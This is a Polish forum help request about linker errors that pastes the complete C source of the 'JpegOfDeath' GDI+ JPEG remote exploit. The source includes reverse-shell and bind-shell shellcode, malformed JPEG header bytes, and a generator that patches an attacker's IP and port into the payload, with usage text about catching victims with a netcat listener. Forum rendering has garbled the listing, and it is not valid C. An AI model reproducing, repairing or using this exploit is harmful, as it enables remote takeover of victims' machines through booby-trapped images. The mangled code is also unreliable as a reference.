Problem :
Takie błędy mam podczas kompilacji. Może ktoś pomoże?
Kompiluję to:
[Linker error] undefined reference to `WSAStartup@8'
[Linker error] undefined reference to `htonl@4'
[Linker error] undefined reference to `WSACleanup@0'
Takie błędy mam podczas kompilacji. Może ktoś pomoże?
Kompiluję to:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
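/*
 * Exploit data. The arrays below are the raw byte strings that main() writes
 * into the generated file: two JPEG header fragments (header1, header2), two
 * short byte strings named setNOPs1/setNOPs2 (presumably machine code, judging
 * by the names), and two alternative payloads (reverse_shellcode,
 * bind_shellcode).
 *
 * Notes for analysts and detection engineers:
 *  - header1 starts with the JPEG start-of-image marker (FF D8) and contains a
 *    comment segment (marker FF FE) whose two-byte length field is 00 01. A
 *    JPEG segment length counts its own two bytes, so a value below 2 is
 *    malformed. Flagging that condition identifies such a file without
 *    depending on the payload bytes that follow.
 *  - main() writes the operator-supplied address and port into the payload
 *    arrays through xor_data() (XOR with 0x92), so they do not appear in clear
 *    in the output file.
 *  - This listing lost characters in forum rendering and is not a faithful
 *    copy of the original source.
 */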
char reverse_shellcode[] =
"xD9xE1xD9x34"
"x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80"
"x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB"
"x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC"
"x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1"
"xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF"
"x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA"
"x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8"
"x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3"
"xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3"
"x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5"
"xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF"
"xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7"
"x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54"
"xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B"
"xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3"
"xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C"
"xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7"
"xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA"
"x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19"
"x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93"
"x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19"
"x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52"
"x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";
char bind_shellcode[] =
"xD9xE1xD9x34x24x58x58x58"
"x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2"
"xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB"
"x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F"
"x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C"
"x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6"
"x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2"
"x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51"
"xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B"
"x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96"
"x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92"
"x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51"
"xA3x6DxC5xC5xFAx90x92x83xCEx1Bx74xF8x82xC4xC1x6D"
"xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4"
"x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45"
"x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA"
"x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3"
"xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79"
"x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D"
"xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97"
"xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6"
"x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F"
"x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4"
"x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3"
"x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";
char header1[] =
"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"
"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"
"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"
"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"
"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"
"x2Ex3Ex35x35x35x35x35x3E";
char setNOPs1[] =
"xE8x00x00x00x00x5Bx8Dx8B"
"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
char setNOPs2[] =
"x3ExE8x00x00x00x00x5Bx8Dx8B"
"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
char header2[] =
"x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"
"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"
"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"
"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"
"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"
"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"
"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"
"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"
"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"
"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"
"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"
"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"
"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"
"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"
"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"
"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"
"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"
"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"
"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"
"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"
"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"
"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"
"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"
"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"
"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"
"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"
"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"
"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"
"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"
"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"
"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"
"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"
"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"
"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"
"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"
"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"
"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"
"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"
"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"
"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"
"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"
"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"
"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"
"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"
"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"
"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"
"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"
"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"
"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"
"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"
"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"
"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"
"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"
"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"
"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"
"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"
"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"
"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"
"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"
"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"
"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"
"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"
"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"
"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"
"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"
"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"
"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"
"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"
"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"
"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"
"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68";
/* Code... */
/*
 * Mask a single byte with the fixed one-byte key 0x92.
 * XOR is its own inverse, so applying the function twice returns the input.
 */
unsigned char xor_data(unsigned char byte)
{
    const unsigned char key = 0x92;

    return (unsigned char)(byte ^ key);
}
/*
 * Print the command-line help text for the generator and terminate.
 *
 * prog_name: program name substituted into the usage and example lines.
 *
 * Does not return: the function ends with exit(-1).
 *
 * NOTE(review): this listing lost characters in forum rendering, so the
 * format strings below are not what the original author wrote and the block
 * is not valid C as shown.
 */
void print_usage(char *prog_name)
{
printf(" Exploit Usage:n");
printf("t%s -r your_ip | -b [-p port] <jpeg_filename>nn", prog_name);
printf(" Parameters:n");
printf("t-r your_ip or -bt Choose -r for reverse connect attack modentttt
and choose -b for a bind attack. By defaultntttt if you don't specify -r or
-b then a bindntttt attack will be generated.nn");
printf("t-p (optional)tt This option will allow you to change the port ntttt
used for a bind or reverse connect attack.ntttt If the attack mode is bind
then thentttt victim will open the -p port. If the attackntttt mode
is reverse connect then the port yountttt specify will be the one you want
to listenntttt on so the victim can connect to yountttt right away.nn");
printf(" Examples:n");
printf("t%s -r 68.6.47.62 -p 8888 test.jpgn", prog_name);
printf("t%s -b -p 1542 myjpg.jpgn", prog_name);
printf("t%s -b whatever.jpgn", prog_name);
printf("t%s -r 68.6.47.62 exploit.jpgnn", prog_name);
printf(" Remember if you use the -r option to have netcat listeningn");
printf(" on the port you are using for the attack so the victim willn");
printf(" be able to connect to you when exploited...nn");
printf(" Example:n");
printf("tnc.exe -l -p 8888");
/* help output always ends the process with a failure status */
exit(-1);
}
/*
 * Entry point of the file generator: parses the command line, patches the
 * selected payload array in memory, and writes one JPEG file to disk.
 *
 * No socket is created in this function. Winsock is initialised only so that
 * htonl() can be called; the program's sole output is the file it writes.
 *
 * Returns EXIT_SUCCESS after the file is written and EXIT_FAILURE if the
 * output file cannot be opened. The process exits with -1 through
 * print_usage() when no arguments are given, or if WSAStartup() is reported
 * as failed.
 *
 * NOTE(review): command-line input is not validated here (argv[i+1], the
 * strchr() results and strncpy() termination are all unchecked).
 * NOTE(review): this listing lost characters in forum rendering and is not
 * valid C as shown; the comments below describe only what is visible.
 */
int main(int argc, char *argv[])
{
FILE *fout;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 1337; /* default port for bind and reverse attacks */
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char attack_mode = 2; /* bind by default */
char *p1 = polish, *p2 = polish;
char ip_addr[256];
char str_num[16];
char jpeg_filename[256];
WSADATA wsa;
printf(" +------------------------------------------------+n");
printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |n");
printf(" | September, 23, 2004 |n");
printf(" +------------------------------------------------+n");
if (argc < 2)
print_usage(argv[0]);
/* process commandline */
for (i = 0; i < (unsigned) argc; i++) {
if (argv[0] == '-') {
switch (argv[1]) {
case 'r':
/* reverse connect */
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
case 'b':
/* bind */
attack_mode = 2;
break;
case 'p':
/* port */
port = atoi(argv[i+1]);
break;
}
}
}
/* after the loop i equals argc, so argv[i-1] is the last argument: the output file name */
strncpy(jpeg_filename, argv[i-1], 255);
fout = fopen(argv[i-1], "wb");
if( !fout ) {
printf("Error: JPEG File %s Not Created!n", argv[i-1]);
return(EXIT_FAILURE);
}
/* initialize the socket library */
/* NOTE(review): WSAStartup() reports failure through a non-zero return code, not SOCKET_ERROR */
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!n");
exit(-1);
}
/* port in network byte order; only bits 16..31 of the result are used below */
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1) {
/* reverse connect attack */
/*
 * Two port bytes and the four dotted-quad octets parsed from ip_addr are
 * stored at fixed offsets of reverse_shellcode, each passed through
 * xor_data() first, so the address and port are not present in clear in
 * the generated file.
 */
reverse_shellcode[184] = (char) 0x90;
reverse_shellcode[185] = (char) 0x92;
reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
reverse_shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
reverse_shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[182] = xor_data((char)raw_num);
}
if (attack_mode == 2) {
/* bind attack */
/* only the two port bytes are patched (XOR-masked) in this mode */
bind_shellcode[204] = (char) 0x90;
bind_shellcode[205] = (char) 0x92;
bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));
bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));
}
/* build the exploit jpeg */
/*
 * Order of writes below: header1, setNOPs1, header2, 0x90 fill up to offset
 * 0x63c, the selected payload, more 0x90 fill, setNOPs2, then a closing
 * marker. The long 0x90 runs and this fixed layout are visible in every
 * file the generator writes, which makes them candidate detection
 * artifacts alongside the malformed segment in header1.
 */
j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
for(i = 0; i < sizeof(header1) - 1; i++)
fputc(header1, fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)
fputc(setNOPs1, fout);
for(i=0;i<sizeof(header2)-1;i++)
fputc(header2, fout);
for( i = j; i < 0x63c; i++)
fputc(0x90, fout);
j = i;
if (attack_mode == 1) {
for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)
fputc(reverse_shellcode, fout);
}
else if (attack_mode == 2) {
for(i = 0; i < sizeof(bind_shellcode) - 1; i++)
fputc(bind_shellcode, fout);
}
for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)
fputc(0x90, fout);
for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)
fputc(setNOPs2[j], fout);
/* presumably the JPEG end-of-image marker in the original source */
fprintf(fout, "xFFxD9");
/* NOTE(review): fout is never passed to fclose(); no close call is visible in this function */
WSACleanup();
printf(" Exploit JPEG file %s has been generated!n", jpeg_filename);
return(EXIT_SUCCESS);
}[/b]